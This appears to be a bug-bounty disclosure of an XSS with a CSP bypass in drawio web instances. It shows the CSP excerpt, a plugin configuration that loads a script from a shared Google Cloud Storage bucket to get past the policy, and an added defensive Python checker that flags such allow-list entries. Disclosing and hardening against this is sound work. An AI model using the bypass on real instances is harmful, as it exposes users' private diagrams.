XSS with CSP bypass on WEB instances in jgraph/drawio
Valid
Reported on
Sep 5th 2022
📝 Description
Drawio WEB instances allow https://storage.googleapis.com in the CSP script-src directive. By abusing the XSS found in this report, it is possible to bypass the CSP and leak private diagram content.
🕵️♂️ Proof of Concept
On the web application side, JavaScript execution is restricted by the following CSP (excerpt):
...
script-src https://www.dropbox.com https://api.trello.com 'self' https://viewer.diagrams.net https://storage.googleapis.com https://apis.google.com https://*.pusher.com 'sha256-AVuOIxynOo/05KDLjyp0AoBE+Gt/KE1/vh2pS+yfqes=' 'sha256-r/ILW7KMSJxeo9EYqCTzZyCT0PZ9gHN1BLgki7vpR+A=' 'sha256-5DtSB5mj34lxcEf+HFWbBLEF49xxJaKnWGDWa/utwQA=' 'sha256-vS/MxlVD7nbY7AnV+0t1Ap338uF7vrcs7y23KjERhKc='
...
Because the policy allows scripts to be loaded from https://storage.googleapis.com, which is the public URL shared by all Google Cloud Storage buckets, any bucket on that origin can be used to serve our code. The plugin configuration below points drawio at a script hosted there:
{
  "plugins": [
    "https://storage.googleapis.com/bypass_csp/xss.js"
  ]
}
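The root cause is that the allow-list trusts a whole multi-tenant origin rather than one bucket. The following added example, which is not part of the original report or the drawio project, parses a CSP header and flags script-src entries that name a shared-content host without a bucket path; the `SHARED_CONTENT_HOSTS` set and the `/drawio-plugins/` bucket path in the hardened policy are illustrative assumptions.

```python
import re

# Hosts where any account can publish files under one shared origin, so
# allow-listing the bare host lets anyone serve scripts that pass the CSP.
# Illustrative assumption, not an authoritative catalogue.
SHARED_CONTENT_HOSTS = {"storage.googleapis.com"}


def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive: [source, ...]}."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def risky_script_sources(header: str) -> list:
    """Return script-src entries that trust an entire shared-content host.

    A host-source with a path (e.g. https://storage.googleapis.com/my-bucket/)
    narrows the match to that prefix. Caveat: CSP ignores the path when the
    script is reached through a redirect, so the bucket must also be
    non-writable by other tenants for the path restriction to mean anything.
    """
    flagged = []
    for src in parse_csp(header).get("script-src", []):
        m = re.match(r"^(?:https?://)?([^/'\s]+)(/.*)?$", src)
        if not m:  # quoted keywords such as 'self' or 'sha256-...' are skipped
            continue
        host, path = m.group(1).lower(), m.group(2)
        if host in SHARED_CONTENT_HOSTS and not path:
            flagged.append(src)
    return flagged


# script-src directive as quoted in the report (one hash kept for brevity).
REPORTED_CSP = (
    "script-src https://www.dropbox.com https://api.trello.com 'self' "
    "https://viewer.diagrams.net https://storage.googleapis.com "
    "https://apis.google.com https://*.pusher.com "
    "'sha256-AVuOIxynOo/05KDLjyp0AoBE+Gt/KE1/vh2pS+yfqes='"
)

# Same policy with the shared host scoped to one (assumed) project-owned bucket.
HARDENED_CSP = REPORTED_CSP.replace(
    "https://storage.googleapis.com ",
    "https://storage.googleapis.com/drawio-plugins/ ",
)
```

Running `risky_script_sources(REPORTED_CSP)` returns the bare `https://storage.googleapis.com` entry, while the hardened policy yields nothing.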

Impact
An attacker could use it to access any user's confidential content.
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability will not receive a CVE